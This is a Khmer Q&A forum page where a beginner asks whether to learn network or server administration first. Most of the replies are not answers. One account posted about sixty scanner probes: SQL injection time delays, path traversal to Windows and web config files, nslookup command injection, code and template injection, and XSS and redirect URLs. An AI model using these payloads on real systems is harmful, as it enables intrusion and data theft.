៣០
វិច្ឆិកា

Chhorn Saron

សួស្តីអ្នក​ទាំងអស់​គ្នា​! ខ្ញុំ​ចង់ចេះ គ្រប់គ្រង Network និង គ្រប់គ្រង Server ។ ចំពេោះមុខវិជ្ជា​ទាំងពីរ​នេះ តើ​ខ្ញុំ​គួររៀនមុខវិជ្ជាមួយណាមុនគេ សម្រាប់​អ្នក​ដែល​មិនចេះអី្វសោះ​ដូចជា​ខ្ញុំ​? អរគុណ

ចម្លើយ

Ejiofor

 សូមអរគុណ​សម្រាប់​ព័ត៌មាន​នេះ

dragon ball super episode 115

នៅថ្ងៃ

lgexxhrs

response.write (9562456*9479192)

នៅថ្ងៃ

lgexxhrs

set|set&set

នៅថ្ងៃ

lgexxhrs

'+response.write (9562456*9479192) +'

នៅថ្ងៃ

lgexxhrs

$ (nslookup 4klvu17h)

នៅថ្ងៃ

lgexxhrs

"+response.write (9562456*9479192) +"

នៅថ្ងៃ

lgexxhrs

&nslookup o8iwC04d&'\"`0&nslookup o8iwC04d&`'

នៅថ្ងៃ

lgexxhrs

../../../../../../../../../../windows/win.ini

នៅថ្ងៃ

lgexxhrs

$ {9999783+10000418}

នៅថ្ងៃ

១០

lgexxhrs

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

នៅថ្ងៃ

១១

lgexxhrs

../../../../../../../../../../boot.ini

នៅថ្ងៃ

១២

lgexxhrs

12345'"\'\") ;|] * { <>�''💩

នៅថ្ងៃ

១៣

lgexxhrs

1some_inexistent_file_with_long_name.jpg

នៅថ្ងៃ

១៤

lgexxhrs

Http://testasp.vulnweb.com/t/fit.txt

នៅថ្ងៃ

១៥

lgexxhrs

../../../../../../../../../../windows/win.ini.jpg

នៅថ្ងៃ

១៦

lgexxhrs

if (now () =sysdate () ,sleep (6) ,0) /*'XOR (if (now () =sysdate () ,sleep (6) ,0) ) OR'"XOR (if (now () =sysdate () ,sleep (6) ,0) ) OR"*/

នៅថ្ងៃ

១៧

lgexxhrs

1&n928429=v957582

នៅថ្ងៃ

១៨

lgexxhrs

http://testasp.vulnweb.com/t/fit.txt?.jpg

នៅថ្ងៃ

១៩

lgexxhrs

(select (0) from (select (sleep (6) ) ) v) /*'+ (select (0) from (select (sleep (6) ) ) v) +'"+ (select (0) from (select (sleep (6) ) ) v) +"*/

នៅថ្ងៃ

២០

lgexxhrs

������������������������������������������������windows��win.ini

នៅថ្ងៃ

២១

lgexxhrs

testasp.vulnweb.com

នៅថ្ងៃ

២២

lgexxhrs

-1; waitfor delay '0:0:9' —

នៅថ្ងៃ

២៣

lgexxhrs

................windowswin.ini

នៅថ្ងៃ

២៤

lgexxhrs

! ( () &&! |*|*|

នៅថ្ងៃ

២៥

lgexxhrs

-1) ; waitfor delay '0:0:9' —

នៅថ្ងៃ

២៦

lgexxhrs

;print (md5 (acunetix_wvs_security_test) ) ;

នៅថ្ងៃ

២៧

lgexxhrs

^ (#$! @#$) ( () ) ) ******

នៅថ្ងៃ

២៨

lgexxhrs

..\..\..\..\..\..\..\..\windows\win.ini

នៅថ្ងៃ

២៩

lgexxhrs

-1) ) ; waitfor delay '0:0:9' —

នៅថ្ងៃ

៣០

lgexxhrs

';print (md5 (acunetix_wvs_security_test) ) ;$a='

នៅថ្ងៃ

៣១

lgexxhrs

1 waitfor delay '0:0:9' —

នៅថ្ងៃ

៣២

lgexxhrs

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

នៅថ្ងៃ

៣៣

lgexxhrs

";print (md5 (acunetix_wvs_security_test) ) ;$a="

នៅថ្ងៃ

៣៤

lgexxhrs

Ofmf16NL'; waitfor delay '0:0:3' —

នៅថ្ងៃ

៣៥

lgexxhrs

http://testasp.vulnweb.com/t/xss.html?%00.jpg

នៅថ្ងៃ

៣៦

lgexxhrs

http://hitCVyT2cdUIe.bxss.me/

នៅថ្ងៃ

៣៧

lgexxhrs

$ {@print (md5 (acunetix_wvs_security_test) ) } \

នៅថ្ងៃ

៣៨

lgexxhrs

kZaVvM1b') ) ; waitfor delay '0:0:3' —

នៅថ្ងៃ

៣៩

lgexxhrs

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

នៅថ្ងៃ

៤០

lgexxhrs

-1;select pg_sleep (3) ; —

នៅថ្ងៃ

៤១

lgexxhrs

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

នៅថ្ងៃ

៤២

lgexxhrs

) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) )

នៅថ្ងៃ

៤៣

lgexxhrs

WEB-INF/web.xml

នៅថ្ងៃ

៤៤

lgexxhrs

cTdxX13c') ;select pg_sleep (9) ; —

នៅថ្ងៃ

៤៥

lgexxhrs

//www.vulnweb.com

នៅថ្ងៃ

៤៦

lgexxhrs

'" () &%

នៅថ្ងៃ

៤៧

lgexxhrs

(select convert (int,CHAR (65) ) )

នៅថ្ងៃ

៤៨

lgexxhrs

/\www.vulnweb.com

នៅថ្ងៃ

៤៩

lgexxhrs

acu8334<s1﹥s2ʺs3ʹuca8334

នៅថ្ងៃ

៥០

lgexxhrs

acux10155��z1��z2a�bcxuca10155

នៅថ្ងៃ

៥១

lgexxhrs

1

នៅថ្ងៃ

៥២

lgexxhrs

$ {@print (md5 (acunetix_wvs_security_test) ) }

នៅថ្ងៃ

៥៣

lgexxhrs

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

នៅថ្ងៃ

៥៤

lgexxhrs

fJQbRu1W') ; waitfor delay '0:0:3' —

នៅថ្ងៃ

៥៥

lgexxhrs

-1) ;select pg_sleep (3) ; —

នៅថ្ងៃ

៥៦

lgexxhrs

-1) ) ;select pg_sleep (6) ; —

នៅថ្ងៃ

៥៧

lgexxhrs

/www.vulnweb.com

នៅថ្ងៃ

៥៨

lgexxhrs

mm0xip4D';select pg_sleep (6) ; —

នៅថ្ងៃ

៥៩

lgexxhrs

WEB-INF\web.xml

នៅថ្ងៃ

៦០

lgexxhrs

http://www.vulnweb.com

នៅថ្ងៃ

៦១

lgexxhrs

1'" () &%

នៅថ្ងៃ

៦២

lgexxhrs

1zL30YOv') ) ;select pg_sleep (9) ; —

នៅថ្ងៃ

៦៣

lgexxhrs

{ {10000350*9999801} }

នៅថ្ងៃ

ចម្លើយរបស់អ្នក

សូមឆ្លើយចម្លើយ​ជាខ្មែរទៅនឹង​សំណួរខាងលើ ។

ដើម្បីអាចឆ្លើយតបនឹងសំណួរនេះ សូមឡុកចូលទៅគណនីរបស់អ្នកជាមុនសិនដោយចុចត្រង់នេះ

ឆ្លើយតាម Facebook